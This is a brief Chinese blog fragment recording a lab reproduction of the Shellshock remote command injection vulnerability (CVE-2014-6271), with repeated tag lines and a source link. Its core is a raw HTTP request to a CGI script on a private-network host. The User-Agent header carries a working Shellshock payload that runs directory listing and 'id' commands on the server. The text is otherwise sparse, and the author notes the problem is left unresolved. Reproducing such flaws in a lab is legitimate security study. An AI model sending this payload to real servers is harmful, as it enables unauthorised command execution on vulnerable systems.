标签:调用 connect unix cgi 存在 style splay csdn pre
payload:
GET /victim.cgi HTTP/1.1 Host: 192.168.183.134:8080 User-Agent: () { :;};echo;echo $(/bin/ls -al /);/usr/bin/id; Accept:*/* text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Referer: http://192.168.183.134:8080/ Upgrade-Insecure-Requests: 1
这个问题暂时留着吧。。。
Shellshock远程命令注入(CVE-2014-6271)漏洞复现
标签:调用 connect unix cgi 存在 style splay csdn pre
原文地址:https://www.cnblogs.com/foe0/p/11359060.html